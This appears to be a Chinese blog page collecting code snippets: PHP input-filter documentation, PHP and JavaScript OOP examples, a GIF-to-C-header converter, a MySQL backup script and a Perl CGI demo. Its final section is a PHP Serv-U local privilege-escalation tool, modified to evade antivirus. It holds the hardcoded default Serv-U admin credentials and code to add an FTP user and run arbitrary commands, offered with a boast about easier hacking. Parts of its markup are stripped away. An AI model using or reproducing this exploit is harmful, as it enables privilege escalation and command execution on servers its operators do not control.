JavaScript代码
- <script language='javascript' src='Base642.js'></script>
- <SCRIPT LANGUAGE="JavaScript">
- <!--
- var b = new Base64();
- de = b.Decode64("aHR0cDovL3d3dy5pYnJpbmcuc2UvcGhwLnBocA==");
- alert(de);
- //-->
- </SCRIPT>
Base642.js 见附件
PHP的输入过滤器
PHP代码
- $result = filter_input(INPUT_GET, ‘email’, FILTER_VALIDATE_EMAIL);
- var_dump($result);
- ?>
简介
This extension serves for validating and filtering data coming usually from some insecure source such as user input.
该扩展用于检验和过滤来自不安全途径的数据,比如说用户的输入。
The following filters currently exist, be sure to read the Filter Constants section for information that describes the behavior of each constant:
下边这些过滤器是当前已经有的,请阅读过滤器常量小节查看各个常量的行为描述。
表 1. Existing filters
<table border="1" class="CALSTABLE">
<colgroup> <col></col> <col></col> <col></col> <col></col> </colgroup> <tr>
<th>
ID
</th>
<th>
Name
</th>
<th>
Options
</th>
<th>
Flags
</th>
<th>
Description
</th>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_VALIDATE_INT</strong></tt>
</td>
<td>
"int"
</td>
<td>
<code class="parameter">min_range</code>, <code class="parameter">max_range</code>
</td>
<td>
<tt class="constant"><strong>FILTER_FLAG_ALLOW_OCTAL</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_ALLOW_HEX</strong></tt>
</td>
<td>
Validates value as integer, optionally from the specified range.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_VALIDATE_BOOLEAN</strong></tt>
</td>
<td>
"boolean"
</td>
<td>
</td>
<td>
</td>
<td>
Returns <tt class="constant"><strong>TRUE</strong></tt> for "1", "true", "on" and "yes", <tt class="constant"><strong>FALSE</strong></tt> for "0", "false", "off", "no", and "", <tt class="constant"><strong>NULL</strong></tt> otherwise.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_VALIDATE_FLOAT</strong></tt>
</td>
<td>
"float"
</td>
<td>
</td>
<td>
</td>
<td>
Validates value as float.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_VALIDATE_REGEXP</strong></tt>
</td>
<td>
"validate_regexp"
</td>
<td>
<code class="parameter">regexp</code>
</td>
<td>
</td>
<td>
Validates value against <code class="parameter">regexp</code>, a <a href="ref.pcre.html">Perl-compatible</a> regular expression.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_VALIDATE_URL</strong></tt>
</td>
<td>
"validate_url"
</td>
<td>
</td>
<td>
<tt class="constant"><strong>FILTER_FLAG_SCHEME_REQUIRED</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_HOST_REQUIRED</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_PATH_REQUIRED</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_QUERY_REQUIRED</strong></tt>
</td>
<td>
Validates value as URL, optionally with required components.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_VALIDATE_EMAIL</strong></tt>
</td>
<td>
"validate_email"
</td>
<td>
</td>
<td>
</td>
<td>
Validates value as e-mail.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_VALIDATE_IP</strong></tt>
</td>
<td>
"validate_ip"
</td>
<td>
</td>
<td>
<tt class="constant"><strong>FILTER_FLAG_IPV4</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_IPV6</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_NO_PRIV_RANGE</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_NO_RES_RANGE</strong></tt>
</td>
<td>
Validates value as IP address, optionally only IPv4 or IPv6 or not from private or reserved ranges.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_SANITIZE_STRING</strong></tt>
</td>
<td>
"string"
</td>
<td>
</td>
<td>
<tt class="constant"><strong>FILTER_FLAG_NO_ENCODE_QUOTES</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_STRIP_LOW</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_STRIP_HIGH</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_ENCODE_LOW</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_ENCODE_HIGH</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_ENCODE_AMP</strong></tt>
</td>
<td>
Strip tags, optionally strip or encode special characters.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_SANITIZE_STRIPPED</strong></tt>
</td>
<td>
"stripped"
</td>
<td>
</td>
<td>
</td>
<td>
Alias of "string" filter.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_SANITIZE_ENCODED</strong></tt>
</td>
<td>
"encoded"
</td>
<td>
</td>
<td>
<tt class="constant"><strong>FILTER_FLAG_STRIP_LOW</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_STRIP_HIGH</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_ENCODE_LOW</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_ENCODE_HIGH</strong></tt>
</td>
<td>
URL-encode string, optionally strip or encode special characters.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_SANITIZE_SPECIAL_CHARS</strong></tt>
</td>
<td>
"special_chars"
</td>
<td>
</td>
<td>
<tt class="constant"><strong>FILTER_FLAG_STRIP_LOW</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_STRIP_HIGH</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_ENCODE_HIGH</strong></tt>
</td>
<td>
HTML-escape <tt class="literal">'"<>&</tt> and characters with ASCII value less than 32, optionally strip or encode other special characters.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_UNSAFE_RAW</strong></tt>
</td>
<td>
"unsafe_raw"
</td>
<td>
</td>
<td>
<tt class="constant"><strong>FILTER_FLAG_STRIP_LOW</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_STRIP_HIGH</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_ENCODE_LOW</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_ENCODE_HIGH</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_ENCODE_AMP</strong></tt>
</td>
<td>
Do nothing, optionally strip or encode special characters.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_SANITIZE_EMAIL</strong></tt>
</td>
<td>
"email"
</td>
<td>
</td>
<td>
</td>
<td>
Remove all characters except letters, digits and <tt class="literal">!#$%&'*+-/=?^_`{|}~@.[]</tt>.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_SANITIZE_URL</strong></tt>
</td>
<td>
"url"
</td>
<td>
</td>
<td>
</td>
<td>
Remove all characters except letters, digits and <tt class="literal">$-_.+!*'(),{}|\\^~[]`<>#%";/?:@&=</tt>.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_SANITIZE_NUMBER_INT</strong></tt>
</td>
<td>
"number_int"
</td>
<td>
</td>
<td>
</td>
<td>
Remove all characters except digits and <tt class="literal">+-</tt>.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_SANITIZE_NUMBER_FLOAT</strong></tt>
</td>
<td>
"number_float"
</td>
<td>
</td>
<td>
<tt class="constant"><strong>FILTER_FLAG_ALLOW_FRACTION</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_ALLOW_THOUSAND</strong></tt>, <tt class="constant"><strong>FILTER_FLAG_ALLOW_SCIENTIFIC</strong></tt>
</td>
<td>
Remove all characters except digits, <tt class="literal">+-</tt> and optionally <tt class="literal">.,eE</tt>.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_SANITIZE_MAGIC_QUOTES</strong></tt>
</td>
<td>
"magic_quotes"
</td>
<td>
</td>
<td>
</td>
<td>
Apply <a href="function.addslashes.html"><strong class="function">addslashes()</strong></a>.
</td>
</tr>
<tr>
<td>
<tt class="constant"><strong>FILTER_CALLBACK</strong></tt>
</td>
<td>
"callback"
</td>
<td>
</td>
<td>
<a href="language.pseudo-types.html#language.types.callback"><strong class="type">callback</strong></a> function or method
</td>
<td>
Call user-defined function to filter data.
</td>
</tr>
</table>
可以通过php.ini查看是否支持filter.
filter
| Input Validation and Filtering |
| Directive |
|---|
使用:
参考本文前边的例子,用 [email protected] 和 ?email=invalidemail.address 测试。
php interface
PHP代码
- interface IA {
- public function a();
- public function b();
- }
- class Test implements IA {
- public function a() {
- echo ‘aa’;
- }
- public function b() {
- echo ‘bb’;
- }
- public function c() {
- echo ‘cc’;
- }
- }
- class Test2 extends Test {
- public function a() {
- echo ‘aaaa!!’;
- }
- }
- $o = new Test2();
- $o->a();
- ?>
玩PHP源文件-把LOGO的gif文件转成.h文件中的数据
PHP代码
- // 将GIF转换为C语言中的H文件
- $filename = "logo.gif";
- $fp = fopen($filename, "rb");
- $buffer = fread($fp, filesize($filename));
- fclose($fp);
- $len = strlen($buffer);
- $fp = fopen("mylogo.h", "wb");
- fwrite($fp, "unsigned char php_logo[] = {");
- for ($i=0; $i<=$len; $i++) {
- if($i % 10 == 0) {
- fwrite($fp, "\n\t\t");
- }
- if($i == $len) {
- $str = str_pad(ord(substr($buffer, $i, 1)), 3, " ", STR_PAD_LEFT);
- } else {
- $str = str_pad(ord(substr($buffer, $i, 1)), 3, " ", STR_PAD_LEFT) . ", ";
- }
- fwrite($fp, $str);
- }
- fwrite($fp, " };\n");
- fclose($fp);
- ?>
mysql 备份的PHP脚本
PHP代码
- // 备份数据库
- function sqldumptable($table, $fp=0) {
- $tabledump = "DROP TABLE IF EXISTS `$table`;\n";
- $tabledump .= "CREATE TABLE `$table` (\n";
- $firstfield=1;
- $fields = mysql_query("SHOW FIELDS FROM `$table`");
- while ($field = mysql_fetch_array($fields)) {
- if (!$firstfield) {
- $tabledump .= ",\n";
- } else {
- $firstfield=0;
- }
- $tabledump .= " `$field[Field]` $field[Type]";
- if (!emptyempty($field["Default"])) {
- if($field['Default']!=‘CURRENT_TIMESTAMP’ ) $field['Default'] = "'{$field['Default']}’";
- $tabledump .= " DEFAULT $field[Default]";
- }
- if ($field['Null'] != "YES") {
- $tabledump .= " NOT NULL";
- }
- if ($field['Extra'] != "") {
- $tabledump .= " $field[Extra]";
- }
- }
- mysql_free_result($fields);
- $keys = mysql_query("SHOW KEYS FROM `$table`");
- while ($key = mysql_fetch_array($keys)) {
- $kname=$key['Key_name'];
- if ($kname != "PRIMARY" and $key['Non_unique'] == 0) {
- $kname="UNIQUE|$kname";
- }
- if(!is_array($index[$kname])) {
- $index[$kname] = array();
- }
- $index[$kname][] = $key['Column_name'];
- }
- mysql_free_result($keys);
- while(list($kname, $columns) = @each($index)) {
- $tabledump .= ",\n";
- $colnames=implode($columns,",");
- if ($kname == "PRIMARY") {
- $tabledump .= " PRIMARY KEY ($colnames)";
- } else {
- if (substr($kname,0,6) == "UNIQUE") {
- $kname=substr($kname,7);
- }
- $tabledump .= " KEY $kname ($colnames)";
- }
- }
- $tabledump .= "\n);\n\n";
- if ($fp) {
- fwrite($fp,$tabledump);
- } else {
- echo $tabledump;
- }
- $rows = mysql_query("SELECT * FROM `$table`");
- $numfields = mysql_num_fields($rows);
- while ($row = mysql_fetch_array($rows)) {
- $tabledump = "INSERT INTO `$table` VALUES(";
- $fieldcounter=-1;
- $firstfield=1;
- while (++$fieldcounter<$numfields) {
- if (!$firstfield) {
- $tabledump.=", ";
- } else {
- $firstfield=0;
- }
- if (!isset($row[$fieldcounter])) {
- $tabledump .= "NULL";
- } else {
- $tabledump .= "’".mysql_escape_string($row[$fieldcounter])."’";
- }
- }
- $tabledump .= ");\n";
- if ($fp) {
- fwrite($fp,$tabledump);
- } else {
- echo $tabledump;
- }
- }
- mysql_free_result($rows);
- fwrite($fp,"\n\n\n");
- }
- ?>
Javascript中的prototype的一个简单例子
XML/HTML代码
- >
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <title> new document title>
- <meta name="generator" content="editplus" />
- <meta name="author" content="" />
- <meta name="keywords" content="" />
- <meta name="description" content="" />
- head>
- <body>
- <script type="text/javascript">
- var call = function () {
- //this.a = function (a) { alert(a); };
- this.num = 134;
- }
- call.prototype.a = function (a) { alert(a); };
- var v = new call;
- v.a(v.num);
- //–>
- script>
- body>
- html>
Javascript下的伪OOP用法测试
JavaScript代码
-
- // 方法一
- var cellphone = {
- number: 13684042440,
- dial: function () {
- }
- };
- // 方法二
- var cellphone = new Object();
- cellphone.number = 13484042440;
- cellphone.dial = function () {
- alert("Calling "+this.number);
- }
- cellphone.dial();
- // 给已有的类追加方法
- String.prototype.trim = function () {
- var tmp = this.replace(/^\s+/,”);
- tmp = tmp.replace(/\s+$/,”);
- return tmp;
- }
- var str = " sfdfd sfsd ";
- str2=str.trim();
- alert("’"+str+"’");
- alert("’"+str2+"’");
- function Beesn() {
- this.member = new Array(‘Kevin’,‘Vonsk’,‘Edison’,‘Michael’,‘Whl’),
- this.list = function () {
- for(var i=0;i<this.member.length;i++) {
- alert(this.member[i]);
- }
- },
- this.show = function () {
- this.member = this.member.shift();
- alert(this.member);
- //for(i in this.member) {
- // alert(this.member[i]);
- //}
- }
- }
- var our = new Beesn;
- our.show();
- //arguments 对象的用法。
- function ArgTest(a, b, c){
- var i, s = "The ArgTest function expected ";
- var numargs = arguments.length; // 获取被传递参数的数值。
- var expargs = ArgTest.length; // 获取期望参数的数值。
- if (expargs < 2)
- s += expargs + " argument. ";
- else
- s += expargs + " arguments. ";
- if (numargs < 2)
- s += numargs + " was passed.";
- else
- s += numargs + " were passed.";
- s += "\n\n"
- for (i =0 ; i < numargs; i++){ // 获取参数内容。
- s += " Arg " + i + " = " + arguments[i] + "\n";
- }
- return(s); // 返回参数列表。
- }
- alert( ArgTest(1,our,our) );
- // caller demo
- function callerDemo() {
- if (callerDemo.caller) {
- var a= callerDemo.caller.toString();
- alert(a);
- } else {
- alert("this is a top function");
- }
- }
- function handleCaller() {
- callerDemo();
- }
- callerDemo();
- //callee可以打印其本身
- function calleeDemo() {
- alert(arguments.callee);
- }
- //用于验证参数
- function calleeLengthDemo(arg1, arg2) {
- if (arguments.length==arguments.callee.length) {
- window.alert("验证形参和实参长度正确!");
- return;
- } else {
- alert("实参长度:" +arguments.length);
- alert("形参长度: " +arguments.callee.length);
- aert(calleeLengthDemo.length);
- }
- }
- //递归计算
- var sum = function(n){
- if (n <= 0)
- return 1;
- else
- return n + arguments.callee(n – 1);
- }
- calleeLengthDemo(1,2,3);
- var vehicle=Class.create();
- vehicle.prototype.initialize= function(type)
- {
- this.type=type;
- }
- vehicle.prototype.showSelf= function()
- {
- alert("this vehicle is "+ this.type);
- }
- var Class = {
- create: function() {
- returnfunction() {
- this.initialize.apply(this, arguments);
- }
- }
- }
- var moto=new vehicle("Moto");
- moto.showSelf();
- // 测试extend
- Object.extend = function(destination, source) {
- for (property in source) {
- destination[property] = source[property];
- }
- return destination;
- }
- Object.prototype.extend = function(object) {
- return Object.extend.apply(this, [this, object]);
- }
- var obj = new Object();
- obj.extend({
- f1: function () {
- alert(‘f1′);
- },
- f2: function () {
- alert(‘f2′);
- }
- });
- obj.f2();
- String.prototype.isEmail = function () {
- return /^[0-9a-z\-_\.]+@[0-9a-z\-_\.]+\.[a-z]+$/i.test(this);
- };
- var str = "[email protected]";
- alert( str.isEmail() );
- //alert(/^[0-9a-z\-_\.]+@[0-9a-z\-_\.]+\.[a-z]+$/i.test(str));
- //–>
测试方法:
请一段一段的测试。测试一段时,先把别的行注释。
Perl 的测试代码
Java代码
- #!E:/Perl/bin/perl.exe
- ##
- ## printenv — demo CGI program which just prints its environment
- ##
- print "Content-type: text/html; charset=iso-8859-1\n\n";
- foreach $var (sort(keys(%ENV))) {
- $val = $ENV{$var};
- $val =~ s|\n|\\n|g;
- $val =~ s|"|\\"|g;
- print "${var}=\"${val}\"\n";
- }
Serv-U All Version本地提升权限Exp10it Ver 1.5
PHP代码
- /**
- 修改免杀版本 BY:CiKer
- **/
- //
- //Codez begin
- //
- //判断magic_quotes_gpc的值
- set_time_limit(0);
- if (get_magic_quotes_gpc()) {
- $_GET = stripslashes_array($_GET);
- }
- //变量初始化
- $addr = ‘127.0.0.1’;
- $ftpport = 21;
- $adminport = 43958;
- $adminuser = ‘LocalAdministrator’;
- $adminpass = ‘#l@$ak#.lk;0@P’;
- $user = ‘110’;
- $password = ‘110’;
- $homedir = ‘C:\\';
- $dir = ‘C:\\WINNT\\System32\\‘;
- //有改变则赋值
- if ($_GET){
- $addr = $_GET['addr'] ;
- $ftpport = $_GET['ftpport'] ;
- $adminport = $_GET['adminport'] ;
- $adminuser = $_GET['adminuser'] ;
- $adminpass = $_GET['adminpass'] ;
- $user = $_GET['user'] ;
- $password = $_GET['password'] ;
- $homedir = $_GET['homedir'] ;
- if ($_GET['dir']){
- $dir = $_GET['dir'] ;
- }
- }
- ?>
-
-=<Serv-U All Version本地提升权限Exp10it Ver 1.5>=- -
-
- b {font-family : Verdana, sans-serif;font-size : 14px;}
- body,td,p,pre {
- font-family : Verdana, sans-serif;font-size : 12px;
- }
- input {
- font-family: "Verdana";
- font-size: "11px";
- BACKGROUND-COLOR: "#FFFFFF";
- height: "18px";
- border: "1px solid #666666";
- }
-
-
Serv-U All Version本地提升权限Exp10it Ver 1.5 -
- 添加Serv-U用户部分
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- //添加用户
- if ($_GET['action']=="up"){
- up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir);
- }
- ?>
-
-
执行命令部分 -
-
-
-
-
-
-
-
-
-
-
- //执行命令
- if ($_GET['action']=="execute"){
- ftpcmd($ftpport,$user,$password,$dir,$_GET['cmd']);
- }
- ?>
-
-
Copycenter (C) 2004 我非我 All centers Reserved. 免杀修改 BY:CiKer 从此Hacking的道路更宽敞了…